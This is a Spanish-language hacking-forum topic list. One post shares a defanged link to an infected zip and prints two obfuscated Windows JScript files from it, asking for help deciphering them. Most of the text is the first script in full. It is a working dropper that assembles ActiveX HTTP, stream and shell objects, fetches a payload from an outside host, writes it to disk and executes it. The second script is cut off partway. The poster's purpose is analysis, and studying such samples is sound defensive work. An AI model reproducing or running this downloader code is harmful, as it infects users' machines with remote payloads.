elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Temas
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17
31  Programación / .NET (C#, VB.NET, ASP) / Crear ejecutable nativo no .net en vb.net en: 7 Diciembre 2018, 19:55 pm
Hola desde que conocí vb.net huvo una gran decepción ya que los ejecutables que se  creaban eran decompilados con un decompilador de net y no con ollydbg

y mi pregunta es que si se pueden crear ejecutables nativos en vb.net y que no puedan ser decompilados con decompiladores para net


saludos Flamer
32  Seguridad Informática / Análisis y Diseño de Malware / alternativa a virustotal en: 15 Noviembre 2018, 22:12 pm
hola compañeros como algunos ya saben virus total comparte las muestras con los antivirus y pues quería preguntarles si saben de alguna pagina que sea similar a virus total


saludos
33  Seguridad Informática / Análisis y Diseño de Malware / Archivos de Hendrix en: 11 Noviembre 2018, 18:18 pm
hola les comparto algunos archivos de hendrix que encontré en la web, en su mayoría todos son del 2006 aquí el link


http://www.geocities.ws/cusacoxa/

rescaten lo que puedan ya que no se cuanto dure esa pagina


saludos Flamer y si encuentran otro crackme aparte del  Axiateam.zip  me avisan
34  Seguridad Informática / Análisis y Diseño de Malware / descifrar codigo de un virus js en: 22 Julio 2018, 06:01 am
hola amigos navegando por internet por un a cortador se me descargo un archivo zip de este sitio

ATENCION EL SIGUIENTE LINK CONTIENE UN ARCHIVO CON VIRUS

Código:
hxxp://167.99.55.222/xsx5/installer.zip


y la curiosidad me hizo abrirlo y adentro contenía 2 archivos js y pues al no entender el código lo publico aquí a ver quien me ayuda a descifrarlo

Código
  1.  
  2. function lhf(n) {
  3.    return chhjy[6] + ohzn[11] + uflh.xpcj + yggsv[14]
  4. }
  5.  
  6. function jfsx(n) {
  7.    return umubg.zqdwb + zoq[15] + crqs.czo
  8. }
  9.  
  10. function sgrl(n) {
  11.    return sicl[0] + zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + lla.hre + uflh.fje + ohzn[10] + ohzn[11]
  12. }
  13.  
  14. function rdm(n) {
  15.    return sicl[0]
  16. }
  17.  
  18. function fdbg(n) {
  19.    return wxsf.xeqo + dhl[0] + chhjy[13] + dhl[0] + crqs.iff + lcx[4] + sicl[0] + qbnx[1] + mgnyo.xah + ohzn[11] + uflh.fje + ohzn[10]
  20. }
  21.  
  22. function szxyw(n) {
  23.    return iqyl[10] + qbnx[1] + qbnx[1] + zva[6] + chhjy[10] + umubg.hzxa + umubg.hzxa + qso[3] + yggsv[3] + dhl[11] + ohzn[11] + chhjy[6] + lcx[4] + zoq[19] + yggsv[16] + uflh.xpcj + yggsv[3] + dhl[11] + lcx[4] + mgnyo.xah + yggsv[16] + umubg.hzxa + wxsf.zwav + chhjy[6] + wxsf.zwav + uflh.mzrn + umubg.hzxa + wxsf.xeqo + sicl[0] + uflh.oqn + zva[6] + yggsv[14] + uflh.fje + qbnx[1] + ohzn[11] + mgnyo.xah + lcx[4] + ohzn[11] + wxsf.zwav + ohzn[11]
  24. }
  25.  
  26. function vfjqh(n) {
  27.    return cew[5]
  28. }
  29.  
  30. function wbkj(n) {
  31.    return iqyl[10] + qbnx[1] + qbnx[1] + zva[6] + chhjy[10] + umubg.hzxa + umubg.hzxa + iqyl[10] + uflh.xpcj + jhv.zzg + lla.ydspg + chhjy[6] + zva[10] + yggsv[3] + ohzn[10] + crqs.rdjk + uflh.oqn + qbnx[1] + dhl[11] + yggsv[15] + cew[16] + jhv.zzg + dhl[11] + cew[16] + chhjy[6] + lcx[4] + zoq[19] + yggsv[16] + ohzn[10] + umubg.hzxa
  32. }
  33.  
  34. function vror(n) {
  35.    return cew[5]
  36. }
  37.  
  38. function exmcp(n) {
  39.    return sicl[0]
  40. }
  41.  
  42. function xuqj(n) {
  43.    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + lcx[4] + sicl[0] + iqyl[10] + ohzn[11] + dhl[11] + dhl[11]
  44. }
  45.  
  46. function xeve(n) {
  47.    return chhjy[13] + zva[6] + ohzn[11] + uflh.xpcj
  48. }
  49.  
  50. function dlw(n) {
  51.    return zva[0]
  52. }
  53.  
  54. function nzban(n) {
  55.    return cew[5] + mgnyo.xah + yggsv[3] + qbnx[1] + ohzn[11]
  56. }
  57.  
  58. function ouklt(n) {
  59.    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
  60. }
  61.  
  62. function txm(n) {
  63.    return chhjy[6] + ohzn[11] + uflh.xpcj + yggsv[14]
  64. }
  65.  
  66. function ntxa(n) {
  67.    return yggsv[12]
  68. }
  69.  
  70. function gmmc(n) {
  71.    return mgnyo.xah + uflh.oqn + uflh.xpcj
  72. }
  73.  
  74. function zjzno(n) {
  75.    return cew[5] + yggsv[3] + uflh.xpcj + crqs.rfcdv + qbnx[1] + qbnx[1] + zva[6] + lcx[4] + cew[5] + yggsv[3] + uflh.xpcj + crqs.rfcdv + qbnx[1] + qbnx[1] + zva[6] + cew[2] + ohzn[11] + ickh[8] + uflh.oqn + ohzn[11] + chhjy[6] + qbnx[1] + lcx[4] + uflh.mzrn + lcx[4] + chhjy[1]
  76. }
  77.  
  78. function hmnf(n) {
  79.    return yggsv[16] + zva[6] + ohzn[11] + uflh.xpcj
  80. }
  81.  
  82. function yci(n) {
  83.    return cew[2] + ohzn[11] + chhjy[6] + zva[6] + yggsv[16] + uflh.xpcj + chhjy[6] + ohzn[11] + crqs.iff + yggsv[16] + yggsv[14] + yggsv[15]
  84. }
  85.  
  86. function sibmy(n) {
  87.    return yggsv[14] + ohzn[11] + zva[6] + lcx[4] + ohzn[11] + wxsf.zwav + ohzn[11]
  88. }
  89.  
  90. function omlpg(n) {
  91.    return ohzn[11]
  92. }
  93.  
  94. function krdq(n) {
  95.    return dhl[11] + ohzn[11] + uflh.xpcj + jhv.zzg + qbnx[1] + iqyl[10]
  96. }
  97.  
  98. function jqoe(n) {
  99.    return umubg.zqdwb + zoq[15] + crqs.czo
  100. }
  101.  
  102. function mcgy(n) {
  103.    return cew[10] + yggsv[16] + chhjy[6] + yggsv[3] + qbnx[1] + yggsv[3] + yggsv[16] + uflh.xpcj
  104. }
  105.  
  106. function emal(n) {
  107.    return dhl[11] + ohzn[11] + uflh.xpcj + jhv.zzg + qbnx[1] + iqyl[10]
  108. }
  109.  
  110. function fwagy(n) {
  111.    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
  112. }
  113.  
  114. function lokh(n) {
  115.    return qso[5] + dhl[11] + yggsv[16] + chhjy[6] + ohzn[11]
  116. }
  117.  
  118. function yclp(n) {
  119.    return uflh.xpcj + ickh[1]
  120. }
  121.  
  122. function pvz(n) {
  123.    return chhjy[6] + uflh.oqn + zva[10] + chhjy[6] + qbnx[1] + mgnyo.xah + yggsv[3] + uflh.xpcj + jhv.zzg
  124. }
  125.  
  126. function wvt(n) {
  127.    return yggsv[16] + zva[6] + ohzn[11] + uflh.xpcj
  128. }
  129.  
  130. function gdnu(n) {
  131.    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1]
  132. }
  133.  
  134. function jgl(n) {
  135.    return crqs.czo + yggsv[15] + zva[6] + ohzn[11]
  136. }
  137.  
  138. function urtaq(n) {
  139.    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
  140. }
  141.  
  142. function bsj(n) {
  143.    return chhjy[6] + ohzn[11] + qbnx[1] + crqs.czo + yggsv[3] + ohzn[10] + ohzn[11] + yggsv[16] + uflh.oqn + qbnx[1] + chhjy[6]
  144. }
  145.  
  146. function fcpyg(n) {
  147.    return zoq[19]
  148. }
  149.  
  150. function rwq(n) {
  151.    return ohzn[10] + yggsv[14] + zva[0] + umubg.hzxa
  152. }
  153.  
  154. function misb(n) {
  155.    return sicl[0] + uflh.fje + uflh.aslpo + ohzn[11] + crqs.czo + yggsv[16] + chhjy[12] + yggsv[3] + dhl[11] + ohzn[11]
  156. }
  157.  
  158. function jqtrw(n) {
  159.    return uflh.fje + dhl[11]
  160. }
  161.  
  162. function mvas(n) {
  163.    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + yggsv[3] + uflh.xpcj + jhv.zzg + lcx[4] + chhjy[12] + yggsv[3] + dhl[11]
  164. }
  165.  
  166. function trg(n) {
  167.    return jhv.zzg + ickh[1] + chhjy[6] + ohzn[10] + cew[16] + uflh.aslpo + ohzn[10] + uflh.oqn + uflh.fje + zva[10] + ickh[1] + chhjy[6] + lla.ydspg + yggsv[15] + uflh.oqn + yggsv[14] + qbnx[1]
  168. }
  169.  
  170. function fyzr(n) {
  171.    return qbnx[3] + sicl[0] + yggsv[6] + qbnx[3] + ryqzj[3] + mgnyo.tvzg + lcx[4] + yggsv[6] + qbnx[3] + ryqzj[3] + crqs.rfcdv + crqs.czo + crqs.czo + cew[10]
  172. }
  173.  
  174. function glvr(n) {
  175.    return zoq[19]
  176. }
  177.  
  178. function qbvjh(n) {
  179.    return sicl[0] + yggsv[15] + chhjy[6] + qbnx[1] + ohzn[11] + ohzn[10] + chhjy[13] + zva[10] + lla.ydspg + ohzn[11] + zoq[19] + qbnx[1]
  180. }
  181.  
  182. function znbrt(n) {
  183.    return umubg.zqdwb + ohzn[11] + qbnx[1] + sicl[0] + zva[6] + ohzn[11] + zoq[19] + yggsv[3] + uflh.fje + dhl[11] + chhjy[12] + yggsv[16] + dhl[11] + yggsv[14] + ohzn[11] + mgnyo.xah
  184. }
  185.  
  186. function ssje(n) {
  187.    for (var h = [7619, 283, n, yclp("vnWU^wj0P_mO+y0")], c = (jqtrw("z!79v$czq^A.ET"), 0); c < 2393; c++)
  188.        for (var u = 0; u < 7169; u++) {
  189.            if (1828 == c) return h[c - 1828 + 2]
  190.        }
  191.    return h[1]
  192. }
  193.  
  194. function wrim() {
  195.    return new ActiveXObject(fyzr("KwgS^vDm(8A"))
  196. }
  197.  
  198. function ygqth() {
  199.    return new Date
  200. }
  201. var qso = ["Oyr", "Ldhfp", "Ksq", "f", "Ypqiz", "C"],
  202.    iqyl = [599, "Gangi", 887, "T", "e", 634, "Xqydy", 849, "Hlxp", 587, "h"],
  203.    umubg = {
  204.        zqdwb: "G",
  205.        epycx: "Jgb",
  206.        iid: "Gmhxk",
  207.        pipzu: "Hvbv",
  208.        pbcc: 146,
  209.        uxbfa: "Abdk",
  210.        xlm: 748,
  211.        iyv: 827,
  212.        lzkpe: "o",
  213.        qhsk: 362,
  214.        hzxa: "/",
  215.        sfh: ","
  216.    },
  217.    cew = ["Vakm", 682, "R", "Nvuv", "Ket", "W", "e", 423, 684, 19, "P", "7", "$", "z", "a", "Juif", "w", "Dlge", "Juxva", 191],
  218.    zva = [" ", 879, 969, 951, 692, ",", "p", "7169", 297, "30000", "b", "V", "7619"],
  219.    ohzn = [426, "1", "c", "8", "g", 150, 62, "*", 300, "Jhdbq", "m", "e"],
  220.    zoq = ["Gzqba", 680, 743, "Zbc", "Fmwik", "Gjsm", 604, "3", "Ihewl", "0", "P", "2393", "Imiw", "p", "Khf", "E", "Otiv", "Hset", 312, "c"],
  221.    yggsv = [341, "*", 834, "i", "Szl", "h", "X", "eval", "p", "Szhsm", "m", "Tqz", "\\", "Anqnz", "d", "y", "o"],
  222.    ryqzj = [828, "B", "Rprq", "L", "Xstbu", "Z", "Kyg"],
  223.    rglf = {
  224.        swaue: "2",
  225.        unj: 8,
  226.        sri: 213,
  227.        qdr: "Q",
  228.        tbjs: "Bgtf",
  229.        fxvvu: "Fnzm",
  230.        vloc: 361,
  231.        wsyk: 132,
  232.        dfys: "60000",
  233.        ego: "h",
  234.        jhi: 448,
  235.        adnu: "Xuser",
  236.        eck: "Dly",
  237.        nnt: 589,
  238.        jrshr: 926,
  239.        bqj: 322,
  240.        vivr: "Vjc",
  241.        gbz: "Ydq",
  242.        xcxp: "Powwx",
  243.        mpz: "Pkmy"
  244.    },
  245.    jhv = {
  246.        efvno: "Bds",
  247.        elma: "Ntk",
  248.        zzg: "g",
  249.        pzg: 595,
  250.        didg: 860,
  251.        wbjl: ","
  252.    },
  253.    uflh = {
  254.        tfanu: "Baqt",
  255.        oqn: "u",
  256.        ukpl: "9",
  257.        gxn: 904,
  258.        lqmr: "200",
  259.        xpcj: "n",
  260.        aslpo: "v",
  261.        kzqpj: "1828",
  262.        mzrn: "5",
  263.        czd: "Suux",
  264.        hxpgq: "1",
  265.        fje: "a"
  266.    },
  267.    lcx = [554, "Ujtnj", "i", 173, ".", 512],
  268.    pcd = ["Dvx", 26, "Yvr", "b", "n", "0"],
  269.    dhl = ["D", 628, 680, "d", 536, "&", "K", "Cxgf", "Qwlul", 432, "6", "l", "Ijtwg", ";", 513, "Hlbmu", "K"],
  270.    qqzsc = {
  271.        esp: "K",
  272.        lprg: 590,
  273.        hfvw: 762,
  274.        yas: 311,
  275.        rfle: "Xprxo",
  276.        wmlkb: "340"
  277.    },
  278.    qbnx = ["ActiveXObject", "t", 473, "M", "E"],
  279.    wxsf = {
  280.        ojbw: "d",
  281.        gblt: "(",
  282.        mnds: 889,
  283.        zwav: "x",
  284.        jzsnh: "K",
  285.        dly: 737,
  286.        sjvcn: "q",
  287.        xeqo: "A",
  288.        toayq: "Zath",
  289.        pll: 960,
  290.        hhj: "6",
  291.        kac: "Nncvp",
  292.        uosf: "Bfzgz",
  293.        klk: "283",
  294.        scdit: 493,
  295.        fbam: "6",
  296.        ksl: "G",
  297.        dcmrh: "8"
  298.    },
  299.    mgnyo = {
  300.        tvzg: "2",
  301.        xxvy: "E",
  302.        hjxn: "O",
  303.        bsz: 76,
  304.        xah: "r",
  305.        anyl: "^",
  306.        banrv: "S",
  307.        uvgo: 427,
  308.        enqg: "Yre",
  309.        qiyc: "!",
  310.        tfgtq: "Aeur",
  311.        xmiq: 658,
  312.        gxt: "H",
  313.        zxayj: 844,
  314.        mhlh: 764
  315.    },
  316.    crqs = {
  317.        jur: "M",
  318.        iff: "B",
  319.        fyeu: "Qtj",
  320.        zynw: "E",
  321.        negjj: "Erk",
  322.        rfcdv: "H",
  323.        nhd: "u",
  324.        uea: "4",
  325.        rdjk: "k",
  326.        czo: "T",
  327.        rwx: 293,
  328.        ewr: 155,
  329.        ovm: 630,
  330.        dwf: "Jjo",
  331.        ols: "Dtntj",
  332.        qym: "27"
  333.    },
  334.    chhjy = ["Sgsp", "1", "Sgkdb", "5", 505, "J", "s", "Mncp", "Kxcw", "X", ":", 902, "F", "O"],
  335.    lla = {
  336.        ydspg: "j",
  337.        hre: "N",
  338.        omug: "i",
  339.        vgxje: "c",
  340.        kjnt: "-",
  341.        ngs: "Tpjzh",
  342.        fxdp: "("
  343.    },
  344.    sicl = ["S", ")", "Ekt", 517, "Jye", 566, "Nakdd", "2", 966, "Ynn", "1200000", "O", 577, "J", 198, 579, 516, "Uqmqx", "Pnvx"],
  345.    ickh = [645, "z", "C", ":", 579, 564, "Gtca", "Klss", "q", 831, "Gkasc", "Fzk"],
  346.    adq = ["Yagz", "Nkkx", "Wadgu", 267, "7", "9", "v", "k", "Date", 148],
  347.    qwitd = [-27],
  348.    ozl = [340],
  349.    jldvt = [],
  350.    rxiql = [7],
  351.    upkrl = [];
  352. upkrl[0] = szxyw("kwRItA_g8I");
  353. for (var svoyw = [0], bien = [sibmy("T+A!pYFY.z@7M")], naft = !1, xib = ssje(rdm("k^J&c1H_pV")), hkext = eval(vfjqh("RX6.@bbUu.Ki.") + xib + gdnu("&I%PCHgWiQTMfew")), ppkqs = ActiveXObject, oax = ssje(exmcp("to)i.5W;Pr0")), hhy = 0; hhy < upkrl[krdq("ts6JnjK8jS")]; hhy++) {
  354.    var ohdy = ssje(omlpg("6zPp$2GgXu@Rm.")),
  355.        laqo = new ppkqs(oax + mvas("&.^9x8b6hYZN4HF") + ohdy + qbvjh("S;E6vARY5G3"));
  356.    try {
  357.        var sfu = laqo[znbrt("PU2u.NkI3q6Q")](2),
  358.            rokqj = new ppkqs(zjzno("6pD!EIEso8Xi")),
  359.            ucua = 3e4,
  360.            tzjoc = 6e4,
  361.            azvtb = 3e4,
  362.            otleu = 12e5;
  363.        rokqj[bsj("3_GYaOTwN(2pZ")](ucua, tzjoc, azvtb, otleu);
  364.        try {
  365.            for (; trg("DK^9o59@UfKJ6^q");) {
  366.                var dnez = wrim();
  367.                if (dnez[hmnf("fokP*&RS&Iu")](jfsx("R:SGW1az*ztwJm"), wbkj("(ORL4t3xtqDH"), !1), dnez[lhf("FVINJHNP&@dog^")](), 200 != dnez[ouklt("ha!73w$CvnBTy1")]) break
  368.            }
  369.        } catch (n) {}
  370.        if (5 == svoyw[hhy]) {
  371.            var wpc = hkext[sgrl("^AJ+6Qm@ya(j")],
  372.                gifmj = wpc[pvz("C@@X_34t5@-k")](0, wpc[emal("70guj2N,-iWmb")] - 3);
  373.            upkrl[hhy] += gifmj
  374.        }
  375.        sfu += ntxa("_CYoX6EyEi(Gj$"), sfu += bien[hhy];
  376.        var yzt = 5;
  377.        do {
  378.            rokqj[wvt("3BMbECdG6+n")](jqoe("jC5(99%w%6IFJ!"), upkrl[hhy], 0), rokqj[txm("bX.Km)JmP)O")](), yzt--
  379.        } while (200 != rokqj[urtaq("q_R*XFt!g;")] && yzt);
  380.        if (200 == rokqj[fwagy("$z-coFC0TCr")]) {
  381.            var sca = new ppkqs(vror("(GBq5mlqKu_kIDy") + xib + xuqj("eS9Y6HyV0v"));
  382.            if (8 == svoyw[hhy] && (svoyw[hhy] = 0), svoyw[hhy] <= 3) {
  383.                var eqyh = new ppkqs(fdbg("7a,Bd6K.6ND^FWl"));
  384.                eqyh[xeve("_Y$BkGDYp)-6")](), eqyh[jgl("MNbcc$)3fUmN")] = 1, eqyh[mcgy("(0KcZ!4;%XBE5YH")] = 0, eqyh[nzban("DmG1XPy:WXnU")](rokqj[yci("DBgWzCK)zInp.s")]), eqyh[misb("I2I_bBDotbmg")](sfu), eqyh[lokh("d5uyi,h9N+.,jO")](), svoyw[hhy] || sca[gmmc("qnh!lMgrN8OCJu")](ssje(glvr("CpVAuS,Myq-LW&H")) + rwq("_$Q-ElY8GjqyhH") + ssje(fcpyg("JwmqfJuvl+X")) + dlw("(Kn*GxoxnokyP^") + sfu, 0, 0)
  385.            }
  386.        }
  387.    } catch (n) {}
  388. }
  389.  
  390.  


y este es el otro



Código
  1. function wmnhg(n) {
  2.    return bcx[5] + put.poihe + put.poihe + vvbs.rmuqx + opymo.docm + tzyr.nayhc + tzyr.nayhc + niu.mxq + zhi[0] + rov[1] + lko.fbmgm + qit[5] + qit[8] + niu.mywhk + yqo[1] + vvbs.jnws + zhi[0] + rov[1] + qit[8] + niu.fsvd + yqo[1] + tzyr.nayhc + rov[7] + qit[5] + rov[7] + pqjb[7] + tzyr.nayhc + niu.uneo + niu.fih + lko.cpwe + vvbs.rmuqx + put.hykw + tzyr.spfjs + put.poihe + lko.fbmgm + niu.fsvd + qit[8] + lko.fbmgm + rov[7] + lko.fbmgm
  3. }
  4.  
  5. function plh(n) {
  6.    return bcx[5] + put.poihe + put.poihe + vvbs.rmuqx + opymo.docm + tzyr.nayhc + tzyr.nayhc + pqjb[8] + lko.fbmgm + pqjb[4] + lko.fbmgm + rov[7] + sbfwq.yljev + vvbs.rmuqx + bcx[5] + tzyr.spfjs + rov[7] + sbfwq.yljev + opymo.rsdnz + qit[8] + niu.mywhk + yqo[1] + pqjb[4] + tzyr.nayhc
  7. }
  8.  
  9. function ssdie(n) {
  10.    return rov[16] + niu.fsvd + zhi[0] + put.poihe + lko.fbmgm
  11. }
  12.  
  13. function mkwm(n) {
  14.    return niu.fih + tzyr.spfjs + divuu.eplv + lko.fbmgm + qit[1] + yqo[1] + put.qcx + zhi[0] + rov[1] + lko.fbmgm
  15. }
  16.  
  17. function vupzg(n) {
  18.    return rov[16] + zhi[0] + vvbs.jnws + put.begwe + put.poihe + put.poihe + vvbs.rmuqx + qit[8] + rov[16] + zhi[0] + vvbs.jnws + put.begwe + put.poihe + put.poihe + vvbs.rmuqx + glb.nthy + lko.fbmgm + yqo[5] + lko.cpwe + lko.fbmgm + qit[5] + put.poihe + qit[8] + pqjb[7] + qit[8] + kfa[6]
  19. }
  20.  
  21. function cwk(n) {
  22.    return pqjb[13] + opymo.jjuae + qit[1]
  23. }
  24.  
  25. function lqlrb(n) {
  26.    return yqo[1] + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
  27. }
  28.  
  29. function padva(n) {
  30.    return lko.fbmgm
  31. }
  32.  
  33. function vme(n) {
  34.    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe
  35. }
  36.  
  37. function nlc(n) {
  38.    return glb.nthy + lko.fbmgm + qit[5] + vvbs.rmuqx + yqo[1] + vvbs.jnws + qit[5] + lko.fbmgm + opymo.gedag + yqo[1] + put.hykw + opymo.rsdnz
  39. }
  40.  
  41. function wnpk(n) {
  42.    return niu.mywhk
  43. }
  44.  
  45. function fqlvs(n) {
  46.    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + zhi[0] + vvbs.jnws + pnh[10] + qit[8] + put.qcx + zhi[0] + rov[1]
  47. }
  48.  
  49. function qyno(n) {
  50.    return pqjb[4] + put.hykw + kfo.amuzg + tzyr.nayhc
  51. }
  52.  
  53. function sehl(n) {
  54.    return rov[12] + yqo[1] + qit[5] + zhi[0] + put.poihe + zhi[0] + yqo[1] + vvbs.jnws
  55. }
  56.  
  57. function yjf(n) {
  58.    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + qit[8] + niu.fih + bcx[5] + lko.fbmgm + rov[1] + rov[1]
  59. }
  60.  
  61. function vssa(n) {
  62.    return vvbs.jnws + pqjb[8]
  63. }
  64.  
  65. function twy(n) {
  66.    return qit[5] + lko.fbmgm + vvbs.jnws + put.hykw
  67. }
  68.  
  69. function frt(n) {
  70.    return put.tsf
  71. }
  72.  
  73. function ycxqu(n) {
  74.    return tzyr.spfjs + rov[1]
  75. }
  76.  
  77. function pcf(n) {
  78.    return gba.mgjj + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
  79. }
  80.  
  81. function sekmh(n) {
  82.    return rov[16]
  83. }
  84.  
  85. function vgjl(n) {
  86.    return pqjb[13] + opymo.jjuae + qit[1]
  87. }
  88.  
  89. function thpfk(n) {
  90.    return niu.fih + opymo.rsdnz + qit[5] + put.poihe + lko.fbmgm + pqjb[4] + gba.mgjj + sbfwq.yljev + niu.lvg + lko.fbmgm + niu.mywhk + put.poihe
  91. }
  92.  
  93. function mrfu(n) {
  94.    return rov[1] + lko.fbmgm + vvbs.jnws + pnh[10] + put.poihe + bcx[5]
  95. }
  96.  
  97. function axvhz(n) {
  98.    return niu.fsvd + lko.cpwe + vvbs.jnws
  99. }
  100.  
  101. function thk(n) {
  102.    return rov[1] + lko.fbmgm + vvbs.jnws + pnh[10] + put.poihe + bcx[5]
  103. }
  104.  
  105. function wzuge(n) {
  106.    return niu.mywhk
  107. }
  108.  
  109. function yzzhd(n) {
  110.    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
  111. }
  112.  
  113. function nla(n) {
  114.    return niu.fih + niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + divuu.mse + tzyr.spfjs + pqjb[4] + lko.fbmgm
  115. }
  116.  
  117. function pgig(n) {
  118.    return niu.fih
  119. }
  120.  
  121. function yorid(n) {
  122.    return qit[5] + lko.fbmgm + vvbs.jnws + put.hykw
  123. }
  124.  
  125. function mizvs(n) {
  126.    return opymo.rsdnz + yqo[1] + rov[1] + qit[8] + lko.fbmgm + rov[7] + lko.fbmgm
  127. }
  128.  
  129. function zgmt(n) {
  130.    return kfo.amuzg
  131. }
  132.  
  133. function fpu(n) {
  134.    return rov[7] + tzyr.spfjs + pqjb[3] + pqjb[3] + put.poihe + put.hykw + niu.lvg + bcx[5] + zhi[0] + lko.fbmgm + vvbs.jnws + lko.cpwe + sbfwq.yljev + zhi[0] + bcx[10] + rov[7] + niu.lvg + bcx[5] + pqjb[8]
  135. }
  136.  
  137. function ksp(n) {
  138.    return yqo[1] + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
  139. }
  140.  
  141. function yhinm(n) {
  142.    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
  143. }
  144.  
  145. function aic(n) {
  146.    return niu.fih
  147. }
  148.  
  149. function yhiwo(n) {
  150.    return rov[16]
  151. }
  152.  
  153. function ilgq(n) {
  154.    return qit[5] + lko.fbmgm + put.poihe + qit[1] + zhi[0] + pqjb[4] + lko.fbmgm + yqo[1] + lko.cpwe + put.poihe + qit[5]
  155. }
  156.  
  157. function rvl(n) {
  158.    return rwnw.slevm + rov[1] + yqo[1] + qit[5] + lko.fbmgm
  159. }
  160.  
  161. function ujgwe(n) {
  162.    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
  163. }
  164.  
  165. function rjg(n) {
  166.    return psp[2] + niu.fih + kfo.tlxoz + psp[2] + pqjb[14] + pucy[3] + qit[8] + kfo.tlxoz + psp[2] + pqjb[14] + put.begwe + qit[1] + qit[1] + rov[12]
  167. }
  168.  
  169. function nof(n) {
  170.    return qit[5] + lko.cpwe + sbfwq.yljev + qit[5] + put.poihe + niu.fsvd + zhi[0] + vvbs.jnws + pnh[10]
  171. }
  172.  
  173. function mipjn(n) {
  174.    return qit[1] + opymo.rsdnz + vvbs.rmuqx + lko.fbmgm
  175. }
  176.  
  177. function eda(n) {
  178.    return pqjb[13] + lko.fbmgm + put.poihe + niu.fih + vvbs.rmuqx + lko.fbmgm + niu.mywhk + zhi[0] + tzyr.spfjs + rov[1] + put.qcx + yqo[1] + rov[1] + put.hykw + lko.fbmgm + niu.fsvd
  179. }
  180.  
  181. function zxoum(n) {
  182.    return niu.uneo + psp[1] + gba.mgjj + psp[1] + opymo.gedag + qit[8] + niu.fih + put.poihe + niu.fsvd + lko.fbmgm + tzyr.spfjs + pqjb[4]
  183. }
  184.  
  185. function bsqoi(n) {
  186.    for (var o = [7619, 283, n, vssa(",n1r%SSV_-yZ^")], u = (ycxqu("O1.Ew7OI(-IsmI"), 0); u < 2393; u++)
  187.        for (var t = 0; t < 7169; t++) {
  188.            if (1828 == u) return o[u - 1828 + 2]
  189.        }
  190.    return o[1]
  191. }
  192.  
  193. function azqp() {
  194.    return new ActiveXObject(rjg("7,$ppXb3Hj"))
  195. }
  196.  
  197. function nvy() {
  198.    return new Date
  199. }
  200. var pqjb = [241, "Dufzd", 286, "k", "m", "Hnf", 640, "5", "z", 658, 471, "Citte", "c", "G", "L"],
  201.    glb = {
  202.        iuxag: "V",
  203.        nthy: "R",
  204.        fqz: "Jlavq",
  205.        cmzc: "4",
  206.        qvyiw: "F",
  207.        leflp: 393,
  208.        pwalc: 160,
  209.        jxbr: "i",
  210.        lgt: "Pxzt",
  211.        vqne: "O",
  212.        vniif: 892,
  213.        cmg: "Zfrw",
  214.        fffr: "v",
  215.        rrxr: 826,
  216.        dnfj: "("
  217.    },
  218.    psp = ["0", "D", "M", "Ztzh", "Vmh", 293, "W", 311, "6"],
  219.    lko = {
  220.        nnff: "L",
  221.        cpwe: "u",
  222.        euf: "Yuu",
  223.        tux: 936,
  224.        fbmgm: "e",
  225.        ecjw: "Z",
  226.        qvvff: "1828"
  227.    },
  228.    vvbs = {
  229.        phg: 520,
  230.        rmuqx: "p",
  231.        yubsx: "Ruiak",
  232.        bnzv: 890,
  233.        niy: "7169",
  234.        jnws: "n",
  235.        ywqc: 919,
  236.        orx: 469,
  237.        ejk: 948,
  238.        thnn: 562,
  239.        oceqj: "Not",
  240.        kjhlw: "Cfd",
  241.        hpfbk: "Cqa"
  242.    },
  243.    opymo = {
  244.        docm: ":",
  245.        uro: "60000",
  246.        idqx: "Hsy",
  247.        gacqa: "1",
  248.        jjuae: "E",
  249.        udrn: 919,
  250.        bqjtz: "Date",
  251.        zpb: 146,
  252.        rsdnz: "y",
  253.        gedag: "B",
  254.        bde: 151,
  255.        zfy: "eval"
  256.    },
  257.    yqo = ["K", "o", "Parxh", 115, 597, "q", "p", 900, "Zvlbb", "c"],
  258.    pucy = ["2", 911, "2393", "2", "Ijrl", "8", 572],
  259.    kfa = ["J", "Tpgqs", "Yfz", "3", "Dadem", "Exra", "1", "Qvzc", 800, "Yjylt", 433, 585, "Rhbfr", "m", "Coxuw", "r", "r"],
  260.    sbfwq = {
  261.        kru: 726,
  262.        jhmia: "Bebrr",
  263.        zzp: "Sjq",
  264.        lvyv: "T",
  265.        tldql: 907,
  266.        yljev: "b",
  267.        ymo: "Azzx"
  268.    },
  269.    qit = ["Gon", "T", "e", "E", "Hka", "s", "Asc", "E", ".", 80, 727, 248, "2", "e", "r", "4"],
  270.    rov = ["Lgge", "l", 54, "Tskh", "$", 91, "Eghv", "x", "7", 705, "200", "Ozby", "P", "Eixr", ";", "Okhay", "W"],
  271.    isksi = {
  272.        benn: 478,
  273.        sdo: "F",
  274.        pkadk: "3",
  275.        pkrlp: "H",
  276.        aaw: 713,
  277.        upu: "Uov",
  278.        btx: "Vzl"
  279.    },
  280.    tzyr = {
  281.        nayhc: "/",
  282.        nja: "-",
  283.        rhn: 182,
  284.        acgb: 804,
  285.        tdfil: "o",
  286.        azis: "Jutn",
  287.        spfjs: "a",
  288.        nxqlb: "Maj",
  289.        imsao: 995
  290.    },
  291.    pnh = [103, "Mkbt", "w", "5", "A", "Udxc", "Mkhlf", 193, "%", "Nfjw", "g", 161, "J", "i", 316, 593],
  292.    gba = {
